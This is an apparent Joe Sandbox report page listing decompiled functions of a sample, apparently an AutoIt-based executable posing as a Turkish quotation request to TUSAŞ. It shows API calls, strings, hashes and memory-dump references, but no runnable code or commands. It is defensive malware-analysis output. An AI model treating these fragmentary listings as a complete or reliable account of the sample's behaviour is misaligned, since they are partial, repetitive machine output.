Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: bf59379984e8beaf3d0453a6774fcbf6a27f787662e25b5363980aa482322241
Instruction ID: 0bf5776185cebb657e642a2779bd8cb4d85be99cbb6ead10e2be183cba8aea8d
Opcode Fuzzy Hash: bf59379984e8beaf3d0453a6774fcbf6a27f787662e25b5363980aa482322241
Instruction Fuzzy Hash: E631BF76251214BFEB144F10EC89FEB3BADEF59711F148055FE089A291CA758C60CBA0

Function 001E5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 001E5637
_memcmp.LIBVCRUNTIME ref: 001E5659
_memcmp.LIBVCRUNTIME ref: 001E5671
_memcmp.LIBVCRUNTIME ref: 001E5684
_memcmp.LIBVCRUNTIME ref: 001E569E
_memcmp.LIBVCRUNTIME ref: 001E56B1
_memcmp.LIBVCRUNTIME ref: 001E56C9
_memcmp.LIBVCRUNTIME ref: 001E56E4

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 1232b9acc94d3e98883531ae7e34782102553b8b05335a91a47f99401e4b8b56
Instruction ID: aad682d01e70a9c4c072f73bfb1202a44e32545844190b88e6e824f3b0b22e87
Opcode Fuzzy Hash: 1232b9acc94d3e98883531ae7e34782102553b8b05335a91a47f99401e4b8b56
Instruction Fuzzy Hash: D1219565A50E497B97189A228E92FFF339FBE3A39CF540021FD049A581F760ED6081E5

Function 00204FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0020502E, 00205383
Not an Object type, xrefs: 00205007

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: da1a726a62b8ec0c24c714b2e56fa2438e0bf79ea9cd1cfe54794355078a01cd
Instruction ID: 2258cf76653e22f3d9879ab07bc9f9cb51d1784cfdb0f0a23fa16b55bf7988ef
Opcode Fuzzy Hash: da1a726a62b8ec0c24c714b2e56fa2438e0bf79ea9cd1cfe54794355078a01cd
Instruction Fuzzy Hash: 2BD1B175A1071AAFDF10CFA8C881BAEB7B5BF48344F148069E915AB282E770DD55CF90

Function 001C1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001C15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001C1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001C17FB,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001C16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001C16FB

Part of subcall function 001B3820: RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001C1777
__freea.LIBCMT ref: 001C17A2
__freea.LIBCMT ref: 001C17AE

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 50fc3e37401767ccbe7f6defab4a7ebfcfedfec34f12fe91bd717af64f9727b1
Instruction ID: a1d0044614d0da300c02748d40219f8493bb6e2ce8a2a57d6d12afbe8a5274ff
Opcode Fuzzy Hash: 50fc3e37401767ccbe7f6defab4a7ebfcfedfec34f12fe91bd717af64f9727b1
Instruction Fuzzy Hash: C291A472E80216BADF248E64C891FEE7BB5AF6B310F18465DE905E7142DB35DC40CB60

Function 00204523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00204648
VariantInit.OLEAUT32(?), ref: 00204749
VariantClear.OLEAUT32(?), ref: 00204753
VariantClear.OLEAUT32(?), ref: 002047B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 002045D8, 00204706, 002047BE
Incorrect Object type in FOR..IN loop, xrefs: 0020472C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 3022e748e026fc5e4af088d31c8758d6db80296a08026a4a8dac240d9dabbb7f
Instruction ID: 9b236b97faf785d04085a545e87faf14c37304ef328421cba9b11abea00d7b27
Opcode Fuzzy Hash: 3022e748e026fc5e4af088d31c8758d6db80296a08026a4a8dac240d9dabbb7f
Instruction Fuzzy Hash: FA91D1B0A10315ABDF24DFA4C844FAEBBB8EF46710F108559F615AB292D7709951CFA0

Function 001F1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 001F125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 001F1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001F12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001F12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001F135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001F13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001F1430

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: d3a4c0baa0afb99d29ca8c68e11c75f7a470548b26fbf048a1061eb7cb597b00
Instruction ID: cde4c7a8cb2f6fff935804a9028b032ecc83cc0c3129f27fe5892095452be370
Opcode Fuzzy Hash: d3a4c0baa0afb99d29ca8c68e11c75f7a470548b26fbf048a1061eb7cb597b00
Instruction Fuzzy Hash: 6891CF76A00209EFDB05DFA8D884BFEB7B5FF55325F214029EA10EB291D774A941CB90

Function 0019948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: cbb01922c5906a73b08ff5ccde44a7a810d5702ea1371517aad8bca0de24c825
Instruction ID: 615b536176d8de7369d200d3a06ba57aebc4e84274cc710fef846aa4c99a75df
Opcode Fuzzy Hash: cbb01922c5906a73b08ff5ccde44a7a810d5702ea1371517aad8bca0de24c825
Instruction Fuzzy Hash: D1914671D40219EFDF14CFA9C888AEEBBB8FF49320F25814AE515B7291D734A941CB60

Function 00203947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0020396B
CharUpperBuffW.USER32(?,?), ref: 00203A7A
_wcslen.LIBCMT ref: 00203A8A
VariantClear.OLEAUT32(?), ref: 00203C1F

Part of subcall function 001F0CDF: VariantInit.OLEAUT32(00000000), ref: 001F0D1F
Part of subcall function 001F0CDF: VariantCopy.OLEAUT32(?,?), ref: 001F0D28
Part of subcall function 001F0CDF: VariantClear.OLEAUT32(?), ref: 001F0D34

Strings

AUTOIT.ERROR, xrefs: 00203A80, 00203A85
Incorrect Parameter format, xrefs: 002039A6, 00203BA1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 950f4f0d694e623c275ce012b42b48ce81ac09db68748f5b7c7b911696092bae
Instruction ID: 841bec2750669e8c5ef540bbe4f3c3a13aa297d70c124bf74ffff06df5db6edc
Opcode Fuzzy Hash: 950f4f0d694e623c275ce012b42b48ce81ac09db68748f5b7c7b911696092bae
Instruction Fuzzy Hash: 1E9149746183059FC704EF24C48096AB7E8FF99318F14882DF8999B392DB31EE55CB92

Function 00204BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 001E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?,?,001E035E), ref: 001E002B
Part of subcall function 001E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0046
Part of subcall function 001E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0054
Part of subcall function 001E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?), ref: 001E0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00204C51
_wcslen.LIBCMT ref: 00204D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00204DCF
CoTaskMemFree.OLE32(?), ref: 00204DDA

Strings

NULL Pointer assignment, xrefs: 00204E23, 00204E52

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 4233a58510704a0e0a9a04e7566e77931606d2537f05825c4ece31704f50fbc8
Instruction ID: d29759ab542c98e0893d32251a5b13e6b0785132ee334a54a35389884ebe4072
Opcode Fuzzy Hash: 4233a58510704a0e0a9a04e7566e77931606d2537f05825c4ece31704f50fbc8
Instruction Fuzzy Hash: 0B913AB1D0021D9FDF15EFA4D890AEEB7B8BF18304F10816AE915B7291EB709A54CF60

Function 002120FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00212183
GetMenuItemCount.USER32(00000000), ref: 002121B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002121DD
_wcslen.LIBCMT ref: 00212213
GetMenuItemID.USER32(?,?), ref: 0021224D
GetSubMenu.USER32(?,?), ref: 0021225B

Part of subcall function 001E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001E3A57
Part of subcall function 001E3A3D: GetCurrentThreadId.KERNEL32 ref: 001E3A5E
Part of subcall function 001E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001E25B3), ref: 001E3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002122E3

Part of subcall function 001EE97B: Sleep.KERNEL32 ref: 001EE9F3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 46a59756fb039b60fa944e1dad536ed5102bb4f2034ec83d2fb586a4c550074a
Instruction ID: d037a3d87d8be9b8c2fac10ea36d662873f65668a27c706987255644515a7aee
Opcode Fuzzy Hash: 46a59756fb039b60fa944e1dad536ed5102bb4f2034ec83d2fb586a4c550074a
Instruction Fuzzy Hash: 2B718E35A10205EFCB10EF68C845AEEB7F5EF68310F148458F816EB341DB74AA918B90

Function 001EAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001EAEF9
GetKeyboardState.USER32(?), ref: 001EAF0E
SetKeyboardState.USER32(?), ref: 001EAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 001EAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 001EAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 001EAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 001EB020

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9b8a00d2bd41cc948cbb8c1a7ebd0f28414269b005a5978c74190de61081ae78
Instruction ID: e89780d63e6afcb16519642afddb481e1c93b628b0ddcbdebba827c47288e885
Opcode Fuzzy Hash: 9b8a00d2bd41cc948cbb8c1a7ebd0f28414269b005a5978c74190de61081ae78
Instruction Fuzzy Hash: 9A51B1A0608BD53DFB3683368885BBFBEA95F06704F088589F2D9558D2C798BCC8D751

Function 001EACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 001EAD19
GetKeyboardState.USER32(?), ref: 001EAD2E
SetKeyboardState.USER32(?), ref: 001EAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001EADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001EADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001EAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001EAE38

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 1e3da9a84fcf0314b689cd64d17989acc9a6b96c6141fdca51bf36e2ed1b61ca
Instruction ID: 75c71725a8743eda32b993b1380f08dd5bfda46b93958586d592b16c4305a94a
Opcode Fuzzy Hash: 1e3da9a84fcf0314b689cd64d17989acc9a6b96c6141fdca51bf36e2ed1b61ca
Instruction Fuzzy Hash: 6B5116A0548BD53DFB3783768C95BBEBEA96F46300F488488E1D5468C2C394FC88D762

Function 001B542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(001C3CD6,?,?,?,?,?,?,?,?,001B5BA3,?,?,001C3CD6,?,?), ref: 001B5470
__fassign.LIBCMT ref: 001B54EB
__fassign.LIBCMT ref: 001B5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,001C3CD6,00000005,00000000,00000000), ref: 001B552C
WriteFile.KERNEL32(?,001C3CD6,00000000,001B5BA3,00000000,?,?,?,?,?,?,?,?,?,001B5BA3,?), ref: 001B554B
WriteFile.KERNEL32(?,?,00000001,001B5BA3,00000000,?,?,?,?,?,?,?,?,?,001B5BA3,?), ref: 001B5584

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 8f16cf400e049523cfa7137b6d341cfbff6bbe87a815c11a4ca2fc066ace3e89
Instruction ID: 652a2c4d86798449743e04dbf94a79c32bb42956ffabcec25b9204df2fe9eabc
Opcode Fuzzy Hash: 8f16cf400e049523cfa7137b6d341cfbff6bbe87a815c11a4ca2fc066ace3e89
Instruction Fuzzy Hash: 4751E570900648AFDB21CFA8DC85BEEBBFAEF09301F14411AF555E7291D7309A51CB60

Function 001A2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001A2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 001A2D53
_ValidateLocalCookies.LIBCMT ref: 001A2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 001A2E0C
_ValidateLocalCookies.LIBCMT ref: 001A2E61

Strings

csm, xrefs: 001A2DF6

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 90f614e840640fe9ea72a32003b78d5f9377bdb5872381b0d8e28feec9bb057a
Instruction ID: b51b636a5903340e6a19da6ef17a1f9b0c134e37089a785071205b5eeaf733d7
Opcode Fuzzy Hash: 90f614e840640fe9ea72a32003b78d5f9377bdb5872381b0d8e28feec9bb057a
Instruction Fuzzy Hash: C841B238A00209ABCF14DFACC885A9EBBB5BF46324F148155F8146B393D735EA15CB90

Function 002010B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0020304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0020307A
Part of subcall function 0020304E: _wcslen.LIBCMT ref: 0020309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00201112
WSAGetLastError.WSOCK32 ref: 00201121
WSAGetLastError.WSOCK32 ref: 002011C9
closesocket.WSOCK32(00000000), ref: 002011F9

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 3923b8afa645ad1805ae80523cbcf1d7645435b0a4ce56a3093cc643a6c05bc3
Instruction ID: dbaf270c243bc90dbdb75b07b8e8a5128308f6f476e29ee3d1fafd6fba23c599
Opcode Fuzzy Hash: 3923b8afa645ad1805ae80523cbcf1d7645435b0a4ce56a3093cc643a6c05bc3
Instruction Fuzzy Hash: F141E435610205AFDB149F14D884BAAF7E9EF45324F248059F9199B2D2CB70EE51CBE0

Function 001ECF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001ECF22,?), ref: 001EDDFD

Part of subcall function 001EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001ECF22,?), ref: 001EDE16

lstrcmpiW.KERNEL32(?,?), ref: 001ECF45
MoveFileW.KERNEL32(?,?), ref: 001ECF7F
_wcslen.LIBCMT ref: 001ED005
_wcslen.LIBCMT ref: 001ED01B
SHFileOperationW.SHELL32(?), ref: 001ED061

Strings

\*.*, xrefs: 001ECFF3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

